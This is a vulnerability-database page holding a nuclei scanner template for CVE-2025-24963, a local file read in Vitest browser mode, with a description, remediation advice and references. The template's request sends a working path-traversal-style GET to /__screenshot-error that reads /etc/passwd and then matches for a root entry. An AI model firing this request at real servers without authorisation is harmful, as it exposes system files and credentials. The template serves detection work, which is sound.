Lucene search
K

Vitest Browser Mode - Local File Read

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 105 Views

Vitest Browser mode allows file access, posing a risk if exposed; upgrade to versions 2.1.9 or 3.0.4.

Related
Refs
Code
id: CVE-2025-24963

info:
  name: Vitest Browser Mode - Local File Read
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    Vitest is a testing framework powered by Vite. The `__screenshot-error` handler on the browser mode HTTP server that responds any file on the file system. Especially if the server is exposed on the network by `browser.api.host- true`, an attacker can send a request to that handler from remote to get the content of arbitrary files.This `__screenshot-error` handler on the browser mode HTTP server responds any file on the file system. This code was added by commit `2d62051`. Users explicitly exposing the browser mode server to the network by `browser.api.host- true` may get any files exposed. This issue has been addressed in versions 2.1.9 and 3.0.4. Users are advised to upgrade. There are no known workarounds for this vulnerability.
  impact: |
    Attackers can read arbitrary files from the file system when the browser mode server is exposed to the network, potentially exposing source code, configuration files, and sensitive credentials.
  remediation: |
    Upgrade to Vitest version 2.1.9, 3.0.4 or later that addresses the __screenshot-error handler vulnerability.
  reference:
    - https://github.com/advisories/GHSA-8gvc-j273-4wm5
    - https://github.com/vitest-dev/vitest/blob/f17918a79969d27a415f70431e08a9445b051e45/packages/browser/src/node/plugin.ts#L88-L130
    - https://github.com/vitest-dev/vitest/commit/2d62051f13b4b0939b2f7e94e88006d830dc4d1f
    - https://github.com/vitest-dev/vitest/security/advisories/GHSA-8gvc-j273-4wm5
    - https://vitest.dev/guide/browser/config.html#browser-api
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24963
  classification:
    epss-score: 0.02317
    epss-percentile: 0.81367
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.9
    cve-id: CVE-2025-24963
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,vitest,browser,mode,lfi,vuln,vkev

http:
  - raw:
      - |
        GET /__screenshot-error?file=/etc/passwd HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(content_type,'image/png')"
          - "regex('root:.*:0:0:', body)"
        condition: and
# digest: 4a0a00473045022100c71e4808057d5cb25abbb63dad3f76072b42fee11f1c4113ec86c2a980e963b7022060950d1209f06d90daaba2a768bdf4627e4a6696f37d911e69f0365e0212ec49:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 3.15.9 - 7.5
EPSS0.02317
SSVC
105